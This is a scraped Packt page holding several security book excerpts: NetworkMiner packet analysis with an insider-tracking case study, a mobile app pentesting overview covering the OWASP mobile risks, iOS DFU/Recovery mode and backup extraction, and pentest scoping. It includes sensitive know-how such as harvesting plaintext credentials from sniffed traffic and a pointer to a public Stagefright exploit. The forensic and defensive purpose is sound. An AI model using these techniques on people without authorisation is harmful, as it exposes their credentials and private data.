  • 2530

article-image-analyzing-data-packets
Packt
08 Feb 2016
7 min read
Save for later

Analyzing Data Packets

Packt
08 Feb 2016
7 min read
In this article by Samir Datt, the author of the book Learning Network Forensics, you will learn to get your hands dirty by actually capturing and analyzing network traffic. We will learn how to use different software tools to capture and analyze network traffic with real-world scenarios of accessing data over the Internet and the resultant network capture. The article will cover the following topics: Packet sniffing and analysis using NetworkMiner Case study – sniffing out an insider (For more resources related to this topic, see here.) Packet sniffing and analysis using NetworkMiner NetworkMiner is a passive network sniffing or network forensic tool. It is called a passive tool as it does not send out requests—it sits silently on the network, capturing every packet in the promiscuous mode. NetworkMiner is host-centric. This means that it will classify data based on hosts rather than packets, which is what most sniffers such as Wireshark do. The different steps to NetworkMiner usage are as follows: Download and install the NetworkMiner. Then, configure it. Capture the data in NetworkMiner. Finally, analyze the data. NetworkMiner is available for download at SourceForge: http://sourceforge.net/projects/networkminer/. Though NetworkMiner is not as well known as it should be, it's host-centric approach is refreshingly different and effective. Allowing the users to classify traffic based on the IP addresses and not packets helps us to zero in on activities related to the specific computers that are under suspicion or are being investigated. The NetworkMiner interface is shown in the following screenshot: To begin using NetworkMiner, we start by selecting a network adapter from the drop-down list. NetworkMiner places this adapter in the promiscuous mode. Clicking Start begins NetworkMiner on the task of packet collection. While NetworkMiner has the capability of collecting data packets across the network, its real strength comes in to play after the data has been collected. In most of the scenarios, it makes more sense to use Wireshark to capture packets and then use NetworkMiner to do the analysis on the .pcap file that is captured. As soon as data capturing begins, NetworkMiner swings into action by sorting the packets based on the host IP addresses. This is extremely useful since it allows us to identify traffic that is specific to a single IP on the network. Consider that we have a single suspect with a known IP on the network, then we can focus our investigative resources on just that single IP address. Some really great additional features include the ability to identify the media access control (MAC) address of the network interface card (NIC) in use and also the OS of the suspect system. In fact, the icon on the left-hand side of the IP address shows the OS icon, if detected, as shown in the following screenshot: As we can see in the preceding image, some of the devices that are connected to the network under investigation are Windows and BSD devices. The next tab is the Frames tab. The Frames tab view is similar to that of Wireshark and is perhaps one of the lesser used tabs in NetworkMiner, due to the fact that there are so many other richer options available, as shown in the following screenshot: It gives us inputs on the packet length, source and destination IP address, as well as time to live (TTL) of the packet. NetworkMiner has the ability to collate the packets and then reconstruct the constituent files for viewing by the investigator. These files are shown in the Files tab. Assuming that some files were copied/accessed over a network share, it would be possible to view the reconstructed file in the Files tab. The Files tab also depicts the SSL certificates used over a network. This can also be useful from an investigation perspective, as shown in the following screenshot: Similarly, if pictures have been viewed over the network, these are reconstructed in the Images tab. In fact, this can be quite useful especially, when scanned documents are a part of the network traffic. This may happen when the bad guys try to avoid detection from the keyword-based searching. The following is an image depicting the Images tab: The reconstructed graphics are usually depicted as thumbnails. Right-clicking the thumbnail allows us to open the graphic in a picture editor/viewer. DNS queries are also accessible via another tab, as shown in the following image: There are additional tabs available that are notable from the perspective of an investigation. One of these is the Credentials tab. This stores the information related to interactions involving the exchange of credentials with resources that require logons. It is not uncommon to find username and passwords for plain-text logons listed under this tab. One can also find user accounts for popular sites such as Gmail and Facebook. A screenshot of the Credentials tab is as follows: In a number of cases, it is possible to determine the username and passwords of certain websites. Another great feature in NetworkMiner is the ability to import a set of keywords that are to be used to search within packets in the captured .pcap file. This allows us to separate packets that contain our keywords of interest. A screenshot is as follows: Case study – tracking down an insider XYZ Corporation, a medium-sized Government contractor, found that it had begun to lose business to a tiny competitor that seemed to know exactly what the sales team at XYZ Corp was planning. The senior management suspected that an insider was leaking information to the competitor. A network forensic 007 was called in to investigate the problem. A preliminary information-gathering exercise was initiated and a list of keywords was compiled to help in identifying packets that contained information of interest. A list of possible suspects, who had access to the confidential information, was also compiled. The specific network segment relating to the department in question was put under network surveillance. Wireshark was deployed to capture all the network traffic. Additional storage was made available to store the .pcap files generated by Wireshark. The collected .pcap files were analyzed using NetworkMiner. The following screenshot depicts Wireshark capturing traffic: An in-depth analysis of network traffic produced the following findings: An image showing the registration certificate of the company that was competing with XYZ Corp, providing the names of the directors The address of the company in the registration certificate was the residential address of the sales manager of XYZ Corp E-mail communications using personal e-mail addresses between the directors of the competing company and the senior manager sales of XYZ Corp Further offline analysis showed that the sales manager's wife was related to the director of the competing company It was also seen that the sales manager was connecting to the office Wi-Fi network using his android phone The sales manager was noted to be accessing cloud storage using his phone and transferring important files and contact lists It was noted that the sales manager was also in close communication with a female employee in the accounts department and that the connection was intimate The information collected so far was very indicative of the sales manager's involvement with competitors. Based on the preceding network forensics exercise, it was recommended that a full-fledged digital forensic exercise should be initiated, including that of his assigned laptop and phone device. It was also recommended that sufficient corroborating evidence should be collected using log analysis, RAM analysis, and disk forensics to initiate legal/breach of trust action against the suspect(s). Summary In this article, we moved our skills up a notch. You learned how to analyze the captured packets to see what is happening on the network. We also studied how to see the traffic from the specific IP addresses as well as protocol-specific traffic. We also understood how to look for specific traffic based on keywords. Files, private credentials, and images have been examined to identify activities of interest. We have now become a lot better at investigating network activity. Resources for Article:   Further resources on this subject: Introduction to Mobile Forensics [article] Securing vCloud Using the vCloud Networking and Security App Firewall [article] Configuring the alerts [article]
Read more
  • 0
  • 0
  • 4988

article-image-android-and-ios-apps-testing-glance
Packt
02 Feb 2016
21 min read
Save for later

Android and iOS Apps Testing at a Glance

Packt
02 Feb 2016
21 min read
In this article by Vijay Velu, the author of Mobile Application Penetration Testing, we will discuss the current state of mobile application security and the approach to testing for vulnerabilities in mobile devices. We will see the major players in the smartphone OS market and how attackers target users through apps. We will deep-dive into the architecture of Android and iOS to understand the platforms and its current security state, focusing specifically on the various vulnerabilities that affect apps. We will have a look at the Open Web Application Security Project (OWASP) standard to classify these vulnerabilities. The readers will also get an opportunity to practice the security testing of these vulnerabilities via the means of readily available vulnerable mobile applications. The article will have a look at the step-by-step setup of the environment that's required to carry out security testing of mobile applications for Android and iOS. We will also explore the threats that may arise due to potential vulnerabilities and learn how to classify them according to their risks. (For more resources related to this topic, see here.) Smartphones' market share Understanding smartphones' market share will give us a clear picture about what cyber criminals are after and also what could be potentially targeted. The mobile application developers can propose and publish their applications on the stores and be rewarded by a revenue share of the selling price. The following screenshot that was taken from www.idc.com provides us with the overall smartphone OS market in 2015: Since mobile applications are platform-specific, majority of the software vendors are forced to develop applications for all the available operating systems. Android operating system Android is an open source, Linux-based operating system for mobile devices (smartphones and tablet computers). It was developed by the Open Handset Alliance, which was led by Google and other companies. Android OS is Linux-based. It can be programmed in C/C++, but most of the application development is done in Java (Java accesses C libraries via JNI, which is short for Java Native Interface). iPhone operating system (iOS) It was developed by Apple Inc. It was originally released in 2007 for iPhone, iPod Touch, and Apple TV. Apple's mobile version of the OS X operating system that's used in Apple computers is iOS. Berkeley Software Distribution (BSD) is UNIX-based and can be programmed in Objective C. Public Android and iOS vulnerabilities Before we proceed with different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as an operating system and covers various fundamental concepts that need to be understood to gain experience in mobile application security. The following table comprises year-wise operating system releases: Year Android iOS 2007/2008 1.0 iPhone OS 1 iPhone OS 2 2009 1.1 iPhone OS 3 1.5 (Cupcake) 2.0 (Eclair) 2.0.1(Eclair) 2010 2.1 (Eclair) iOS 4 2.2 (Froyo) 2.3-2.3.2(Gingerbread) 2011 2.3.4-2.3.7 (Gingerbread) iOS 5 3.0 (HoneyComb) 3.1 (HoneyComb) 3.2 (HoneyComb) 4.0-4.0.2 (Ice Cream Sandwich) 4.0.3-4.0.4 (Ice Cream Sandwich) 2012 4.1 (Jelly Bean) iOS 6 4.2 (Jelly Bean) 2013 4.3 (Jelly bean) iOS 7 4.4 (KitKat) 2014 5.0 (Lollipop) iOS 8 5.1 (Lollipop) 2015   iOS 9 (beta) An interesting research conducted by Hewlett Packard (HP), a software giant that tested more than 2,000 mobile applications from more than 600 companies, has reported the following statistics (for more information, visit http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-1057ENW.pdf): 97% of the applications that were tested access at least one private information source of these applications 86% of the applications failed to use simple binary-hardening protections against modern-day attacks 75% of the applications do not use proper encryption techniques when storing data on a mobile device 71% of the vulnerabilities resided on the web server 18% of the applications sent usernames and password over HTTP (of the remaining 85%, 18% implemented SSL/HTTPS incorrectly) So, the key vulnerabilities to mobile applications arise due to a lack of security awareness, "usability versus security trade-off" by developers, excessive application permissions, and a lack of privacy concerns. Coupling this with a lack of sufficient application documentation leads to vulnerabilities that developers are not aware of. Usability versus security trade-off For every developer, it would not be possible to provide users with an application with high security and usability. Making any application secure and usable takes a lot of effort and analytical thinking. Mobile application vulnerabilities are broadly categorized as follows: Insecure transmission of data: Either an application does not enforce any kind of encryption for data in transit on a transport layer, or the implemented encryption is insecure. Insecure data storage: Apps may store data either in a cleartext or obfuscated format, or hard-coded keys in the mobile device. An example e-mail exchange server configuration on Android device that uses an e-mail client stores the username and password in cleartext format, which is easy to reverse by any attacker if the device is rooted. Lack of binary protection: Apps do not enforce any anti-reversing, debugging techniques. Client-side vulnerabilities: Apps do not sanitize data provided from the client side, leading to multiple client-side injection attacks such as cross-site scripting, JavaScript injection, and so on. Hard-coded passwords/keys: Apps may be designed in such a way that hard-coded passwords or private keys are stored on the device storage. Leakage of private information: Apps may unintentionally leak private information. This could be due to the use of a particular framework and obscurity assumptions of developers. Android vulnerabilities In July 2015, a security company called Zimperium announced that it discovered a high-risk vulnerability named Stagefright inside the Android operating system. They deemed it as a unicorn in the world of Android risk, and it was practically demonstrated in one of the hacking conferences in the US on August 5, 2015. More information can be found at https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/; a public exploit is available at https://www.exploit-db/exploits/38124/. This has made Google release security patches for all Android operating systems, which is believed to be 95% of the Android devices, which is an estimated 950 million users. The vulnerability is exploited through a particular library, which can let attackers take control of an Android device by sending a specifically crafted multimedia services like Multimedia Messaging Service (MMS). If we take a look at the superuser application downloads from the Play Store, there are around 1 million to 5 million downloads. It can be assumed that a major portion of Android smartphones are rooted. The following graphs show the Android vulnerabilities from 2009 until September 2015. There are currently 54 reported vulnerabilities for the Android Google operating system (for more information, visit http://www.cvedetails.com/product/19997/Google-Android.html?vendor_id=1224). More features that are introduced to the operating system in the form of applications act as additional entry points that allow cyber attackers or security researchers to circumvent and bypass the controls that were put in place. iOS vulnerabilities On June 18, 2015, password stealing vulnerability, also known as Cross Application Reference Attack (XARA), was outlined for iOS and OS X. It cracked the keychain services on jailbroken and non-jailbroken devices. The vulnerability is similar to cross-site request forgery attack in web applications. In spite of Apple's isolation protection and its App Store's security vetting, it was possible to circumvent the security controls mechanism. It clearly provided the need to protect the cross-app mechanism between the operating system and the app developer. Apple rolled a security update week after the XARA research. More information can be found at http://www.theregister.co.uk/2015/06/17/apple_hosed_boffins_drop_0day_mac_ios_research_blitzkrieg/ The following graphs show the vulnerabilities in iOS from 2007 until September 2015. There are around 605 reported vulnerabilities for Apple iPhone OS (for more information, visit http://www.cvedetails.com/product/15556/Apple-Iphone-Os.html?vendor_id=49). As you can see, the vulnerabilities kept on increasing year after year. A majority of the vulnerabilities reported are denial-of-service attacks. This vulnerability makes the application unresponsive. Primarily, the vulnerabilities arise due to insecure libraries or overwriting with plenty of buffer in the stacks. Rooting/jailbreaking Rooting/jailbreaking refers to the process of removing the limitations imposed by the operating system on devices through the use of exploit tools. Rooting/jailbreaking enables users to gain complete control over the operating system of a device. OWASP's top ten mobile risks In 2013, OWASP polled the industry for new vulnerability statistics in the field of mobile applications. The following risks were finalized in 2014 as the top ten dangerous risks as per the result of the poll data and mobile application threat landscape: M1: Weak server-side controls: Internet usage via mobiles has surpassed fixed Internet access. This is largely due to the emergence of hybrid and HTML5 mobile applications. Application servers that form the backbone of these applications must be secured on their own. The OWASP top 10 web application project defines the most prevalent vulnerabilities in this realm. Vulnerabilities such as injections, insecure direct object reference, insecure communication, and so on may lead to the complete compromise of an application server. Adversaries who have gained control over the compromised servers can push malicious content to all the application users and compromise user devices as well. M2: Insecure data storage: Mobile applications are being used for all kinds of tasks such as playing games, fitness monitors, online banking, stock trading, and so on, and most of the data used by these applications are either stored in the device itself inside SQLite files, XML data stores, log files, and so on, or they are pushed on to Cloud storage. The types of sensitive data stored by these applications may range from location information to bank account details. The application programing interfaces (API) that handle the storage of this data must securely implement encryption/hashing techniques so that an adversary with direct access to these data stores via theft or malware will not be able to decipher the sensitive information that's stored in them. M3: Insufficient transport layer protection: "Insecure Data Storage", as the name says, is about the protection of data in storage. But as all the hybrid and HTML 5 apps work on client-server architecture, emphasis on data in motion is a must, as the data will have to traverse through various channels and will be susceptible to eavesdropping and tampering by adversaries. Controls such as SSL/TLS, which enforce confidentiality and integrity of data, must be verified for correct implementations on the communication channel from the mobile application and its server. M4: Unintended data leakage: Certain functionalities of mobile applications may place users' sensitive data in locations where it can be accessed by other applications or even by malware. These functionalities may be there in order to enhance the usability or user experience but may pose adverse effects in the long run. Actions such as OS data caching, key press logging, copy/paste buffer caching, and implementations of web beacons or analytics cookies for advertisement delivery can be misused by adversaries to gain information about users. M5: Poor authorization and authentication: As mobile devices are the most "personal" devices, developers utilize this to store important data such as credentials locally in the device itself and come up with specific mechanisms to authenticate and authorize users locally for the services that users request via the application. If these mechanisms are poorly developed, adversaries may circumvent these controls and unauthorized actions can be performed. As the code is available to adversaries, they can perform binary attacks and recompile the code to directly access authorized content. M6: Broken cryptography: This is related to the weak controls that are used to protect data. Using weak cryptographic algorithms such as RC2, MD5, and so on, which can be cracked by adversaries, will lead to encryption failure. Improper encryption key management when a key is stored in locations accessible to other applications or the use of a predictable key generation technique will also break the implemented cryptography techniques. M7: Client-side injection: Injection vulnerabilities are the most common web vulnerabilities according to OWASP web top 10 dangerous risks. These are due to malformed inputs, which cause unintended action such as an alteration of database queries, command execution, and so on. In case of mobile applications, malformed inputs can be a serious threat at the local application level and server side as well (refer to M1: Weak server-side controls). Injections at a local application level, which mainly target data stores, may result in conditions such as access to paid content that's locked for trial users or file inclusions that may lead to an abuse of functionalities such as SMSes. M8: Security decisions via untrusted inputs: An implementation of certain functionalities such as the use of hidden variables to check authorization status can be bypassed by tampering them during the transit via web service calls or inter-process communication calls. This may lead to privilege escalations and unintended behavior of mobile applications. M9: Improper session handling: The application server sends back a session token on successful authentication with the mobile application. These session tokens are used by the mobile application to request for services. If these session tokens remain active for a longer duration and adversaries obtain them via malware or theft, the user account can be hijacked. M10: Lack of binary protection: A mobile application's source code is available to all. An attacker can reverse engineer the application and insert malicious code components and recompile them. If these tampered applications are installed by a user, they will be susceptible to data theft and may be the victims of unintended actions. Most applications do not ship with mechanisms such as checksum controls, which help in deducing whether the application is tampered or not. In 2015, there was another poll under the OWASP Mobile security group named the "umbrella project". This leads us to have M10 to M2, the trends look at binary protection to take over weak server-side controls. However, we will have wait until the final list for 2015. More details can be found at https://www.owasp.org/images/9/96/OWASP_Mobile_Top_Ten_2015_-_Final_Synthesis.pdf. Vulnerable applications to practice The open source community has been proactively designing plenty of mobile applications that can be utilized for practical tests. These are specifically designed to understand the OWASP top ten risks. Some of these applications are as follows: iMAS: iMAS is a collaborative research project initiated by the MITRE corporation (http://www.mitre.org/). This is for application developers and security researchers who would like to learn more about attack and defense techniques in iOS. More information about iMAS can be found at https://github.com/project-imas/about. GoatDroid: A simple functional mobile banking application for training with location tracking developed by Jack and Ken for Android application security is a great starting point for beginners. More information about GoatDroid can be found at https://github.com/jackMannino/OWASP-GoatDroid-Project. iGoat: The OWASP's iGOAT project is similar to the WebGoat web application framework. It's designed to improve the iOS assessment techniques for developers. More information on iGoat can be found at https://code.google.com/p/owasp-igoat/. Damn Vulnerable iOS Application (DVIA): DVIA is an iOS application that provides a platform for developers, testers, and security researchers to test their penetration testing skills. This application covers all the OWASP's top 10 mobile risks and also contains several challenges that one can solve and come up with custom solutions. More information on the Damn Vulnerable iOS Application can be found at http://damnvulnerableiosapp.com/. MobiSec: MobiSec is a live environment for the penetration testing of mobile environments. This framework provides devices, applications, and supporting infrastructure. It provides a great exercise for testers to view vulnerabilities from different points of view. More information on MobiSec can be found at http://sourceforge.net/p/mobisec/wiki/Home/. Android application sandboxing Android utilizes the well-established Linux protection ring model to isolate applications from each other. In Linux OS, assigning unique ID segregates every user. This ensures that there is no cross account data access. Similarly in Android OS, every app is assigned with its own unique ID and is run as a separate process. As a result, an application sandbox is formed at the kernel level, and the application will only be able to access the resources for which it is permitted to access. This subsequently ensures that the app does not breach its work boundaries and initiate any malicious activity. For example, the following screenshot provides an illustration of the sandbox mechanism: From the preceding Android Sandbox illustration, we can see how the unique Linux user ID created per application is validated every time a resource mapped to the app is accessed, thus ensuring a form of access control. Android Studio and SDK On May 16, 2013 at the Google I/O conference, an Integrated Development Environment (IDE) was released by Katherine Chou under Apache license 2.0; it was called Android Studio and it's used to develop apps on the Android platform. It entered the beta stage in 2014, and the first stable release was on December 2014 from Version 1.0 and it has been announced the official IDE on September 15, 2015. Information on Android Studio and SDK is available at http://developer.android.com/tools/studio/index.html#build-system. Android Studio and SDK heavily depends on the Java SE Development Kit. Java SE Development Kit can be downloaded at http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Some developers prefer different IDEs such as eclipse. For them, Google only offers SDK downloads (http://dl.google.com/android/installer_r24.4.1-windows.exe). There are minimum system requirements that need to be fulfilled in order to install and use the Android Studio effectively. The following procedure is used to install the Android Studio on Windows 7 Professional 64-bit Operating System with 4 GB RAM, 500 Gig Hard Disk Space, and Java Development Kit 7 installed: Install the IDE available for Linux, Windows, and Mac OS X. Android Studio can be downloaded by visiting http://developer.android.com/sdk/index.html. Once the Android Studio is downloaded, run the installer file. By default, an installation window will be shown, as shown in the following screenshot. Click on Next: This setup will automatically check whether the system meets the requirements. Choose all the components that are required and click on Next. It is recommended to read and accept the license and click on Next. It is always recommended to create a new folder to install the tools that will help us track all the evidence in a single place. In this case, we have created a folder called Hackbox in C:, as shown in the following screenshot: Now, we can allocate the space required for the Android-accelerated environment, which will provide better performance. So, it is recommended to allocate a minimum of 2GB for this space. All the necessary files will be extracted to C:Hackbox. Once the installation is complete, you will be able to launch Android Studio, as shown in the following screenshot: Android SDK Android SDK provides developers with the ability to completely build, test, and debug apps that run on the Android platform. It has all the relevant software libraries, APIs, system images of the emulators, documentations, and other tools that help create an Android app. We have installed Android Studio with Android SDK. It is crucial to understand how to utilize the in-built SDK tools as much as possible. This section provides an overview of some of the critical tools that we will be using when attacking an Android app during the penetration testing activity. Emulator, simulators, and real devices Sometimes, we tend to believe that all virtual emulations work in exactly the same way in real devices, which is not really the case. Especially for Android, we have multiple OEMs manufacturing multiple devices, with different chipsets running different versions of Android. It would be challenge for developers to ensure that all the functionalities for the app reflect in the same way in all devices. It is very crucial to understand the difference between an emulator, simulator, and real devices. Simulators An objective of a simulator is to simulate the state of an object, which is exactly the same state as that of an object. It is preferable that the testing happens when a mobile interacts with some of the natural behavior of the available resources. These are reimplementations of the original software applications that are written, and they are difficult to debug and are mostly writing in high-level languages. Emulators Emulators predominantly aim at replicating the closest possible behavior of mobile devices. These are typically used to test a mobile's behavior internally, such as hardware, software, and firmware updates. These are typically written in machine-level languages and are easy to debug. This is again the reimplementation of the real software. Pros Fast, simple, and little or no price associated Emulators/simulators are quickly available to test the majority of the functionality of the app that is being developed It is very easy to find the defects using emulators and fix issues Cons The risk of false positives is increased; some of the functions or protection may actually not work on a real device. Differences in software and hardware will arise. Some of the emulators might be able to mimic the hardware. However, it may or may not work when it is actually installed on that particular hardware in reality. There's a lack of network interoperability. Since emulators are not really connected to a Wi-Fi or cellular network, it may not be possible to test network-based risks/functions. Real devices Real devices are physical devices that a user will be interacting with. There are pros and cons of real devices too. Pros Lesser false positives: Results are accurate Interoperability: All the test cases are on a live environment User experience: Real user experience when it comes to the CPU utilization, memory, and so on for a provided device Performance: Performance issues can be found quickly with real handsets Cons Costs: There are plenty of OEMs, and buying all the devices is not viable. A slowdown in development: It may not be possible to connect an IDE and than emulators. This will significantly slow down the development process. Other issues: The devices that are locally connected to the workstation will have to ensure that USB ports are open, thus opening an additional entry point. Threats A threat is something that can harm an asset that we are trying to protect. In mobile device security, a threat is a possible danger that might exploit a vulnerability to compromise and cause potential harm to a device. A threat can be defined by the motives; it can be any of the following ones: Intentional: An individual or a group with an aim to break an application and steal information Accidental: The malfunctioning of a device or an application may lead to a potential disclosure of sensitive information Others: Capabilities, circumstantial, and so on Threat agents A threat agent is used to indicate an individual or a group that can manifest a threat. Threat agents will be able to perform the following actions: Access Misuse Disclose Modify Deny access Vulnerability The security weakness within a system that might allow attackers to exploit it and break the security of the device is called a vulnerability. For example, if a mobile device is stolen and it does not have the PIN or pass code enabled, the phone is vulnerable to data theft. Risk The intersection between asset (A), threat (T), and vulnerability (V) is a risk. However, a risk can be included along with the probability (P) of the threat occurrences to provide more value to the business. Risk = A x T x V x P These terms will help us understand the real risk to a given asset. Business will be benefited only if these risks are accurately assessed. Understanding threat, vulnerability, and risk is the first step in threat modeling. For a given application, no vulnerabilities or a vulnerability with no threats is considered to be a low risk. Summary In this article, we saw that mobile devices are susceptible to attacks through various threats, which exist due to the lack of sufficient security measures that can be implemented at various stages of the development of a mobile application. It is necessary to understand how these threats are manifested and learn how to test and mitigate them effectively. Proper knowledge of the underlying architecture and the tools available for the testing of mobile applications will help developers and security testers alike in order to protect end users from attackers who may be attempting to leverage these vulnerabilities.
Read more
  • 0
  • 0
  • 3197
article-image-forensics-recovery
Packt
05 Jan 2016
6 min read
Save for later

Forensics Recovery

Packt
05 Jan 2016
6 min read
In this article by Bhanu Birani and Mayank Birani, the authors of the book, IOS Forensics Cookbook, we have discussed Forensics recovery; also, how it is important, when in some investigation cases there is a need of decrypting the information from the iOS devices. These devices are in an encrypted form usually. In this article, we will focus on various tools and scripts, which can be used to read the data from the devices under investigation. We are going to cover the following topics: DFU and Recovery mode Extracting iTunes backup (For more resources related to this topic, see here.) DFU and Recovery Mode In this section we'll cover both the DFU mode and the Recovery mode separately. DFU mode In this section, we will see how to launch the DFU mode, but before that we see what DFU means. DFU stands for Device Firmware Upgrade, which means this mode is used specifically while iOS upgrades. This is a mode where device can be connected with iTunes and still do not load iBoot boot loader. Your device screen will be completely black in DFU mode because neither the boot loader nor the operating system is loaded. DFU bypasses the iBoot so that you can downgrade your device. How to do it... We need to follow these steps in order to launch a device in DFU mode: Turn off your device. Connect your device to the computer. Press your Home button and the Power button, together, for 10 seconds. Now, release the Power button and keep holding the Home button till your computer detects the device that is connected. After sometime, iTunes should detect your device. Make sure that your phone does not show any Restore logo on the device, if it does, then you are in Recovery mode, not in DFU. Once your DFU operations are done, you can hold the Power and Home buttons till you see the Apple logo in order to return to the normal functioning device. This is the easiest way to recover a device from a faulty backup file. Recovery mode In this section, you will learn about the Recovery mode of our iOS devices. To dive deep into the Recovery mode, we fist need to understand a few basics such as which boot loader is been used by iOS devices, how the boot takes place, and so on. We will explore all such concepts in order to simplify the understanding of the Recovery mode. All iOS devices use the iBoot boot loader in order to load the operating systems. The iBoot's state, which is used for recovery and restore purposes, is called Recovery mode. iOS cannot be downgraded in this state as the iBoot is loaded. iBoot also prevents any other custom firmware to flash into device unless it is a jailbreak, that is, "pwned". How to do it... The following are the detailed steps to launch the Recovery mode on any iOS device: You need to turn off your iOS device in order to launch the Recovery mode. Disconnect all the cables from the device and remove it from the dock if it is connected. Now, while holding the Home button, connect your iOS device to the computer using the cable. Hold the Home button till you see the Connect to iTunes screen. Once you see the screen, you have entered the Recovery mode. Now you will receive a popup in your Mac saying "iTunes has detected your iDevice in recovery mode". Now you can use iTunes to restore the device in the Recovery mode. Make sure your data is backed up because the recovery will restore the device to Factory Settings. You can later restore from the backup as well. Once your Recovery mode operations are complete, you will need to escape from the Recovery mode. To escape, just press the power button and the home button concurrently for 10-12 seconds. Extracting iTunes backup Extracting the logical information from the iTunes backup is crucial for forensics investigation. There is a full stack of tools available for extracting data from the iTunes backup. They come in a wide variety, distributed from open source to paid tools. Some of these forensic tools are Oxygen Forensics Suite, Access Data MPE+, EnCase, iBackup Bot, DiskAid, and so on. The famous open source tools are iPhone backup analyzer and iPhone analyzer. In this section, we are going to learn how to use the iPhone backup extractor tools. How to do it... The iPhone backup extractor is an open source forensic tool, which can extract information from device backups. However, there is one constraint that the backup should be created from iTunes 10 onwards. Follow these steps to extract data from iTunes backup: Download the iPhone backup extractor from http://supercrazyawesome.com/. Make sure that all your iTunes backup is located at this directory: ~/Library/ApplicationSupports/MobileSync/Backup. In case you don't have the required backup at this location, you can also copy paste it. The application will prompt after it is launched. The prompt should look similar to the following screenshot: Now tap on the Read Backups button to read the backup available at ~/Library/ApplicationSupports/MobileSync/Backup. Now, you can choose any option as shown here: This tool also allows you to extract data for an individual application and enables you to read the iOS file system backup. Now, you can select the file you want to extract. Once the file is selected, click on Extract. You will be get a popup asking for the destination directory. This complete process should look similar to the following screenshot: There are various other tools similar to this; iPhone Backup Browser is one of them, where you can view your decrypted data stored in your backup files. This tool supports only Windows operating system as of now. You can download this software from http://code.google.com/p/iphonebackupbrowser/. Summary In this article, we covered how to launch the DFU and the DFU and the Recovery modes. We also learned to extract the logical information from the iTunes backup using the iPhone backup extractor tool. Resources for Article: Further resources on this subject: Signing up to be an iOS developer [article] Exploring Swift [article] Introduction to GameMaker: Studio [article]
Read more
  • 0
  • 0
  • 4295

article-image-assessment-planning
Packt
04 Jan 2016
12 min read
Save for later

Assessment Planning

Packt
04 Jan 2016
12 min read
In this article by Kevin Cardwell the author of the book Advanced Penetration Testing for Highly-Secured Environments - Second Edition, discusses the test environment and how we have selected the chosen platform. We will discuss the following: Introduction to advanced penetration testing How to successfully scope your testing (For more resources related to this topic, see here.) Introduction to advanced penetration testing Penetration testing is necessary to determine the true attack footprint of your environment. It may often be confused with vulnerability assessment and thus it is important that the differences should be fully explained to your clients. Vulnerability assessments Vulnerability assessments are necessary for discovering potential vulnerabilities throughout the environment. There are many tools available that automate this process so that even an inexperienced security professional or administrator can effectively determine the security posture of their environment. Depending on scope, additional manual testing may also be required. Full exploitation of systems and services is not generally in scope for a normal vulnerability assessment engagement. Systems are typically enumerated and evaluated for vulnerabilities, and testing can often be done with or without authentication. Most vulnerability management and scanning solutions provide actionable reports that detail mitigation strategies such as applying missing patches, or correcting insecure system configurations. Penetration testing Penetration testing expands upon vulnerability assessment efforts by introducing exploitation into the mix The risk of accidentally causing an unintentional denial of service or other outage is moderately higher when conducting a penetration test than it is when conducting vulnerability assessments. To an extent, this can be mitigated by proper planning, and a solid understanding of the technologies involved during the testing process. Thus, it is important that the penetration tester continually updates and refines the necessary skills. Penetration testing allows the business to understand if the mitigation strategies employed are actually working as expected; it essentially takes the guesswork out of the equation. The penetration tester will be expected to emulate the actions that an attacker would attempt and will be challenged with proving that they were able to compromise the critical systems targeted. The most successful penetration tests result in the penetration tester being able to prove without a doubt that the vulnerabilities that are found will lead to a significant loss of revenue unless properly addressed. Think of the impact that you would have if you could prove to the client that practically anyone in the world has easy access to their most confidential information! Penetration testing requires a higher skill level than is needed for vulnerability analysis. This generally means that the price of a penetration test will be much higher than that of a vulnerability analysis. If you are unable to penetrate the network you will be ensuring your clientele that their systems are secure to the best of your knowledge. If you want to be able to sleep soundly at night, I recommend that you go above and beyond in verifying the security of your clients. Advanced penetration testing Some environments will be more secured than others. You will be faced with environments that use: Effective patch management procedures Managed system configuration hardening policies Multi-layered DMZ's Centralized security log management Host-based security controls Network intrusion detection or prevention systems Wireless intrusion detection or prevention systems Web application intrusion detection or prevention systems Effective use of these controls increases the difficulty level of a penetration test significantly. Clients need to have complete confidence that these security mechanisms and procedures are able to protect the integrity, confidentiality, and availability of their systems. They also need to understand that at times the reason an attacker is able to compromise a system is due to configuration errors, or poorly designed IT architecture. Note that there is no such thing as a panacea in security. As penetration testers, it is our duty to look at all angles of the problem and make the client aware of anything that allows an attacker to adversely affect their business. Advanced penetration testing goes above and beyond standard penetration testing by taking advantage of the latest security research and exploitation methods available. The goal should be to prove that sensitive data and systems are protected even from a targeted attack, and if that is not the case, to ensure that the client is provided with the proper instruction on what needs to be changed to make it so. A penetration test is a snapshot of the current security posture. Penetration testing should be performed on a continual basis. Many exploitation methods are poorly documented, frequently hard to use, and require hands-on experience to effectively and efficiently execute. At DefCon 19 Bruce "Grymoire" Barnett provided an excellent presentation on "Deceptive Hacking". In this presentation, he discussed how hackers use many of the very same techniques used by magicians. This is exactly the tenacity that penetration testers must assume as well. Only through dedication, effort, practice, and the willingness to explore unknown areas will penetration testers be able to mimic the targeted attack types that a malicious hacker would attempt in the wild. Often times you will be required to work on these penetration tests as part of a team and will need to know how to use the tools that are available to make this process more endurable and efficient. This is yet another challenge presented to today's pentesters. Working in a silo is just not an option when your scope restricts you to a very limited testing period. In some situations, companies may use non-standard methods of securing their data, which makes your job even more difficult. The complexity of their security systems working in tandem with each other may actually be the weakest link in their security strategy. The likelihood of finding exploitable vulnerabilities is directly proportional to the complexity of the environment being tested. Before testing begins Before we commence with testing, there are requirements that must be taken into consideration. You will need to determine the proper scoping of the test, timeframes and restrictions, the type of testing (Whitebox, Blackbox), and how to deal with third-party equipment and IP space. Determining scope Before you can accurately determine the scope of the test, you will need to gather as much information as possible. It is critical that the following is fully understood prior to starting testing procedures: Who has the authority to authorize testing? What is the purpose of the test? What is the proposed timeframe for the testing? Are there any restrictions as to when the testing can be performed? Does your customer understand the difference between a vulnerability assessment and a penetration test? Will you be conducting this test with, or without cooperation of the IT Security Operations Team? Are you testing their effectiveness? Is social engineering permitted? How about denial-of-service attacks? Are you able to test physical security measures used to secure servers, critical data storage, or anything else that requires physical access? For example, lock picking, impersonating an employee to gain entry into a building, or just generally walking into areas that the average unaffiliated person should not have access to. Are you allowed to see the network documentation or to be informed of the network architecture prior to testing to speed things along? (Not necessarily recommended as this may instill doubt for the value of your findings. Most businesses do not expect this to be easy information to determine on your own.) What are 